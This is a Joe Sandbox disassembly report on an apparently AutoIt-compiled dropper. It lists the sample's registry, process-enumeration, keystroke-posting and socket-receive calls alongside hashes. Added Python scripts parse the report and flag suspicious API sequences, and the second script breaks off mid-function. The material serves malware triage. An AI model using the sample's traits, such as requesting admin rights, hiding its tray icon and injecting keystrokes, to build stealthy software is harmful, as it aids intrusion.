• 672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f, xrefs: 0042DFDC
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID: 672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f
• API String ID: 4210589936-2477213679
• Opcode ID: 19bf8a41a131c05d9cb3ddd2efd4e8c934d5bf9cf4963efb64c60fd021ed81e8
• Instruction ID: 76b2e57a9ad3b275e425c657dd64ca4b584bcc32bf2a93bfe9d4b1d0a80ffdc2
• Opcode Fuzzy Hash: 19bf8a41a131c05d9cb3ddd2efd4e8c934d5bf9cf4963efb64c60fd021ed81e8
• Instruction Fuzzy Hash: 76416E35A04115BBCF169F65C845FE9FB74BB05324F20431AE829D6290CB34ADA4DFA9
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00413DA1
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00413DCB
• FreeLibrary.KERNEL32(00000000), ref: 00413E80
  • Part of subcall function 00413D72: RegCloseKey.ADVAPI32(?), ref: 00413DE8
  • Part of subcall function 00413D72: FreeLibrary.KERNEL32(?), ref: 00413E3A
  • Part of subcall function 00413D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413E5D
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00413E25
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
• Opcode ID: 06bced75c5a4700cb148c1d95dd365259666634e11fcfdcccdf88d80c8dae19b
• Instruction ID: 8bb4bd37498dd5e1988fbd3db8dbcaf410d6075676ec857373e3a48bf059c6cb
• Opcode Fuzzy Hash: 06bced75c5a4700cb148c1d95dd365259666634e11fcfdcccdf88d80c8dae19b
• Instruction Fuzzy Hash: BC31EAB1D01209BFDB159F95EC85AFFB7BCEF08315F00016AE512E2250D6749F899BA4
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00418FE7
• GetWindowLongW.USER32(00F4E0F0,000000F0), ref: 0041901A
• GetWindowLongW.USER32(00F4E0F0,000000F0), ref: 0041904F
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00419081
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004190AB
• GetWindowLongW.USER32(00000000,000000F0), ref: 004190BC
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004190D6
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: 49860d9b6ced88c90483946857408fcfe02c757ed8e057055595372f126b47a1
• Instruction ID: ad798a6885acd0c8ee4dca39c4125d73cfa0fe177933bda6911af3f966fd4f34
• Opcode Fuzzy Hash: 49860d9b6ced88c90483946857408fcfe02c757ed8e057055595372f126b47a1
• Instruction Fuzzy Hash: 9D315734A00214DFDB20CF58DC95FA63BA5FB4A714F14016AF5198B2B2CB75AC80CF49
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003F08F2
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003F0918
• SysAllocString.OLEAUT32(00000000), ref: 003F091B
• SysAllocString.OLEAUT32(?), ref: 003F0939
• SysFreeString.OLEAUT32(?), ref: 003F0942
• StringFromGUID2.OLE32(?,?,00000028), ref: 003F0967
• SysAllocString.OLEAUT32(?), ref: 003F0975
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: daf0318132922e9cd4e99f57ed1fd2cf5883f2c1cb15e15da6217bb005be5312
• Instruction ID: 0e80ab434333b7fe13f7accb98f327728fdf4fcaad239c2ee54115a25588a324
• Opcode Fuzzy Hash: daf0318132922e9cd4e99f57ed1fd2cf5883f2c1cb15e15da6217bb005be5312
• Instruction Fuzzy Hash: A921A97660121DAF9B159F7CDC84DBB73ACEB09360B018125FA15DB162E7B0EC45C764
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: d5d869372e848abe1d2605b8d1b4fb9f37d1fab1cb8905f0e75801088d60b4d1
• Instruction ID: 652b866a0ee30a50e6edd672cb5ab1b4fdf4d9cd7893e0cc2760acf275760ac6
• Opcode Fuzzy Hash: d5d869372e848abe1d2605b8d1b4fb9f37d1fab1cb8905f0e75801088d60b4d1
• Instruction Fuzzy Hash: 49214C72208115F7D323E6359C12FBBB39CEF66310F20402BF649DB582E6959D41C3A5
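The per-function blocks above are only useful in bulk if they can be searched: which functions touch the registry, in what call order, and which string constants they reference. The parser below reads the "APIs / Strings / Memory Dump Source / Similarity" layout of this report into records for that purpose. It is an added example written for this page, not Joe Sandbox tooling; the sample input is constructed from three blocks on this page (abridged, with the "Associated" entries cut to one and a Strings entry placed in the registry block so that string parsing is exercised), and it assumes the report was saved as plain text with the bullet lines as shown here. The "Download File" text that the HTML export appends to each "Associated" entry is stripped while parsing.

```python
"""Parse the per-function blocks of a Joe Sandbox disassembly report (the
'APIs / Strings / Memory Dump Source / Similarity' layout on this page).
Added example, not Joe Sandbox tooling; assumes the report text was saved
as plain text with the bullet lines shown here."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: three blocks abridged from this page.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 0041225A
• ShellExecuteExW.SHELL32(?), ref: 00412368
  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
• CloseHandle.KERNEL32(00000000), ref: 0041242F
Strings
Memory Dump Source
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
• String ID: @
• Instruction Fuzzy Hash: DE71BF74A006199FCF05EFA4C981AEEB7F5FF08300F00806AE959AB751CB74AD50CB98
APIs
• GetParent.USER32(00000000), ref: 003F3C02
• GetKeyboardState.USER32(?), ref: 003F3C17
• SetKeyboardState.USER32(?), ref: 003F3C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003F3CA4
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• Instruction Fuzzy Hash: F651F8A05047D93DFB378374CC55BBABF996F06300F088489F2D55A8C2D694EE94E760
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00413DA1
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00413DCB
• FreeLibrary.KERNEL32(00000000), ref: 00413E80
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00413E25
Strings
• 672ff0652ff0612ff0652ff0682ff06b, xrefs: 0042DFDC
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• Instruction Fuzzy Hash: BC31EAB1D01209BFDB159F95EC85AFFB7BCEF08315F00016AE512E2250D6749F899BA4
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
                    r"(?P<name>[\w@?$]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^•\s*(?P<val>.*?),\s*xrefs:\s*(?P<xrefs>[0-9A-Fa-f, ]+)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: int                    # call-site address from the hex 'ref:' field
    subcall_of: Optional[int]   # callee address when listed as 'Part of subcall'


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # Similarity and dump-source fields


def parse_blocks(text: str) -> list:
    """One FunctionRecord per block; a block ends at its 'Instruction Fuzzy Hash' line."""
    records, cur, section = [], FunctionRecord(), None
    for line in filter(None, map(str.strip, text.splitlines())):
        if line in SECTIONS:
            section = line
        elif section == "APIs" and (m := API_RE.match(line)):
            sub = int(m["sub"], 16) if m["sub"] else None
            cur.calls.append(ApiCall(m["name"], m["mod"], m["args"] or "", int(m["ref"], 16), sub))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur.strings.append(m["val"])
        elif section not in ("APIs", "Strings") and (m := FIELD_RE.match(line)):
            key, val = m["key"].strip(), m["val"].strip()
            # 'Associated' repeats per block and carries the export's link text.
            cur.fields[key] = val if key != "Associated" else cur.fields.get(key, []) + [val.removesuffix("Download File").strip()]
            if key == "Instruction Fuzzy Hash":
                records.append(cur)
                cur, section = FunctionRecord(), None
    return records


def api_sequence(rec: FunctionRecord, include_subcalls: bool = False) -> list:
    """API names in call-site order (the report itself lists FreeLibrary before RegDeleteKeyW)."""
    calls = [c for c in rec.calls if include_subcalls or c.subcall_of is None]
    return [c.name for c in sorted(calls, key=lambda c: c.ref)]


def int_args(call: ApiCall) -> list:
    """Hex arguments as ints; '?' (not resolved at analysis time) becomes None."""
    return [None if a == "?" else int(a, 16) for a in call.args.split(",")] if call.args else []


def functions_calling(records: list, api_name: str) -> list:
    return [r for r in records if any(c.name == api_name for c in r.calls)]
```

Sorting by the `ref` address matters: the report does not always list calls in execution order (the registry block above shows `FreeLibrary` at 00413E80 before `RegDeleteKeyW` at 00413E25), so a naive read of the bullet order gives the wrong call sequence. The `int_args` helper turns the PostMessageW arguments into `[0, 0x100, 0x10, None]`, which is how you read WM_KEYDOWN and the virtual-key code out of these entries.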
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003F09CB
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003F09F1
• SysAllocString.OLEAUT32(00000000), ref: 003F09F4
• SysAllocString.OLEAUT32 ref: 003F0A15
• SysFreeString.OLEAUT32 ref: 003F0A1E
• StringFromGUID2.OLE32(?,?,00000028), ref: 003F0A38
• SysAllocString.OLEAUT32(?), ref: 003F0A46
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 6e8eeb54085ab7143077715e64a7357c7a899b7d9d9beefe3e28dcaf88c0a8dd
• Instruction ID: 8b897113d9dee9c1e1de62cb1b4dac87e71860455e5cb990bf213c1aec55c581
• Opcode Fuzzy Hash: 6e8eeb54085ab7143077715e64a7357c7a899b7d9d9beefe3e28dcaf88c0a8dd
• Instruction Fuzzy Hash: 88214475604208AFDF159FACDC89DBBB7EDEF093607418125FA19CB262E670EC418764
APIs
  • Part of subcall function 003CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003CD1BA
  • Part of subcall function 003CD17C: GetStockObject.GDI32(00000011), ref: 003CD1CE
  • Part of subcall function 003CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 003CD1D8
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0041A32D
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0041A33A
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0041A345
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0041A354
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0041A360
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: 405d77bbae752a5f4155a589704a7d915e3eb1d838f268367b004ac2ef7d3200
• Instruction ID: f5ba4824a1f7617bd17d73607a778676fe7207faa3151d3b4a1ec3d2e7b18616
• Opcode Fuzzy Hash: 405d77bbae752a5f4155a589704a7d915e3eb1d838f268367b004ac2ef7d3200
• Instruction Fuzzy Hash: 8911D3B110011DBEEF115FA0CC85EE77F6DFF08798F014115BA08A60A0C7769C21DBA8
APIs
• GetClientRect.USER32(?,?), ref: 003CCCF6
• GetWindowRect.USER32(?,?), ref: 003CCD37
• ScreenToClient.USER32(?,?), ref: 003CCD5F
• GetClientRect.USER32(?,?), ref: 003CCE8C
• GetWindowRect.USER32(?,?), ref: 003CCEA5
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
• Opcode ID: 8dac00613a7083f240242aa2364aa3525d49367061667cb73a213574fbe348f2
• Instruction ID: 6d851a91cd8196d18d474421831edf0d7d502cc5edbe6e893fea9b1543f8c800
• Opcode Fuzzy Hash: 8dac00613a7083f240242aa2364aa3525d49367061667cb73a213574fbe348f2
• Instruction Fuzzy Hash: 7AB14A79A10249DBDB10CFA9C484BEEB7B1FF08300F14A12AEC59EB650DB34AD51CB58
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00411C18
• Process32FirstW.KERNEL32(00000000,?), ref: 00411C26
• __wsplitpath.LIBCMT ref: 00411C54
  • Part of subcall function 003D1DFC: __wsplitpath_helper.LIBCMT ref: 003D1E3C
• _wcscat.LIBCMT ref: 00411C69
• Process32NextW.KERNEL32(00000000,?), ref: 00411CDF
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00411CF1
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 1380811348-0
• Opcode ID: 550dd946dfa30376a0cc390be2f3f11d80d4a7f80711719a2cabafc47e619154
• Instruction ID: a860b3eaa126bacfa4e0bf0b62962a6db0cb0ae6175869bb9e0105d67ef59695
• Opcode Fuzzy Hash: 550dd946dfa30376a0cc390be2f3f11d80d4a7f80711719a2cabafc47e619154
• Instruction Fuzzy Hash: E3516E715043409FD721EF24D885FABB7E8EF88754F00492EF6859B251EB74EA04CB96
APIs
  • Part of subcall function 00413C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00412BB5,?,?), ref: 00413C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004130AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004130EF
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00413112
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0041313B
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041317E
• RegCloseKey.ADVAPI32(00000000), ref: 0041318B
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
• API String ID: 3451389628-0
• Opcode ID: 0ffe1cc7202c9f52acf3ced28ec09b0192045e569a7503be2a7d636e72c5a854
• Instruction ID: 447789c2358bc808817acb62c55e52f4a88486516832105ac50de2b4621ff5db
• Opcode Fuzzy Hash: 0ffe1cc7202c9f52acf3ced28ec09b0192045e569a7503be2a7d636e72c5a854
• Instruction Fuzzy Hash: 89515831508304AFC705EF64C881EAABBF9BF88308F04495EF6558B2A1DB75EA45CB56
APIs
• GetMenu.USER32(?), ref: 00418540
• GetMenuItemCount.USER32(00000000), ref: 00418577
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0041859F
• GetMenuItemID.USER32(?,?), ref: 0041860E
• GetSubMenu.USER32(?,?), ref: 0041861C
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0041866D
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
• Opcode ID: 4db7983f9cf4af4f72bf0d981172f17d58d36f60bde9daaf3c8ce1ccca38229b
• Instruction ID: eb929aee77b2bd410f0cad8519a4fbded5d1d08187e34a10a0deed2da678d22e
• Opcode Fuzzy Hash: 4db7983f9cf4af4f72bf0d981172f17d58d36f60bde9daaf3c8ce1ccca38229b
• Instruction Fuzzy Hash: CA519E35E00218AFCB12EF64C945AEEB7F5EF48310F10446AE915BB351DB34AE818B99
APIs
• _memset.LIBCMT ref: 003F4B10
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003F4B5B
• IsMenu.USER32(00000000), ref: 003F4B7B
• CreatePopupMenu.USER32 ref: 003F4BAF
• GetMenuItemCount.USER32(000000FF), ref: 003F4C0D
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003F4C3E
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
• Opcode ID: c43e4f39708c02214cf3baaf33ac184a05e8b29af506c88a25a76772df3820b5
• Instruction ID: 6d78cf88a31fd9380f280b13a02bd61d3a2d59e1f39e0ef0bd6ca18b809fa59e
• Opcode Fuzzy Hash: c43e4f39708c02214cf3baaf33ac184a05e8b29af506c88a25a76772df3820b5
• Instruction Fuzzy Hash: 3251CF70A0130DEBDF26CFA8D988BBEBBF8AF44318F144169E6559B291E3709D44CB51
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0044DC00), ref: 00408E7C
• WSAGetLastError.WSOCK32(00000000), ref: 00408E89
• __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00408EAD
• #16.WSOCK32(?,?,00000000,00000000), ref: 00408EC5 (import by ordinal; ordinal 16 of WSOCK32 is recv)
• _strlen.LIBCMT ref: 00408EF7
• WSAGetLastError.WSOCK32(00000000), ref: 00408F6A
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: ErrorLast$_strlenselect
• String ID:
• API String ID: 2217125717-0
• Opcode ID: df4e2034255185a08ca97e70bf611eb5aef1eba7e0f8233fd3e9fb9c03e86083
• Instruction ID: 459d5a9fd32d537c0539c8a526585dd3aea0988f0f52db6fb5a157f20ba1931d
• Opcode Fuzzy Hash: df4e2034255185a08ca97e70bf611eb5aef1eba7e0f8233fd3e9fb9c03e86083
• Instruction Fuzzy Hash: 5441A271900104ABCB15EBB4CE85EEEB7B9AF48314F10456EF656AB2D1DF349E00CB54
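Three of the function records above are worth more than a glance when triaging an AutoIt-compiled dropper: the CreateToolhelp32Snapshot / Process32FirstW / Process32NextW walk (a process-enumeration loop), the RegConnectRegistryW / RegOpenKeyExW / RegEnumValueW sequence (registry value enumeration), and the select() guarded receive on a WSOCK32 socket whose recv import is hidden behind ordinal #16. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses call lines in the exact "Name.MODULE(args), ref: ADDR" format these records use, resolves WSOCK32 ordinal imports, and flags records whose calls contain each of these ordered sequences. SAMPLE_LISTING is constructed from call lines printed in this report; the pattern labels and the idea of requiring increasing ref addresses are the editor's own heuristics, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox IDA-plugin 'APIs' listings and flag API sequences.

Added example, not from the report or the sample. SAMPLE_LISTING is
constructed from call lines printed in this report; PATTERNS are the
editor's own triage heuristics, not Joe Sandbox signatures.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR";
# subcall lines carry a "Part of subcall function XXXX:" prefix.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[#\w]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Import-by-ordinal names ("#16.WSOCK32") hide the API; the original
# Winsock export ordinals are stable, so resolve the ones we care about.
WSOCK32_ORDINALS = {4: "connect", 16: "recv", 18: "select", 19: "send", 23: "socket"}

# Ordered sequences: every API must be called by the function itself and
# their first occurrences must sit at increasing ref addresses, so that a
# Process32FirstW followed by Process32NextW reads as an enumeration loop.
PATTERNS = {
    "process enumeration via Toolhelp32 snapshot":
        ("CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"),
    "registry value enumeration via RegConnectRegistry":
        ("RegConnectRegistryW", "RegOpenKeyExW", "RegEnumValueW"),
    "socket receive guarded by select()":
        ("select", "recv"),
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int
    subcall_of: Optional[str] = None


def resolve_name(call: ApiCall) -> str:
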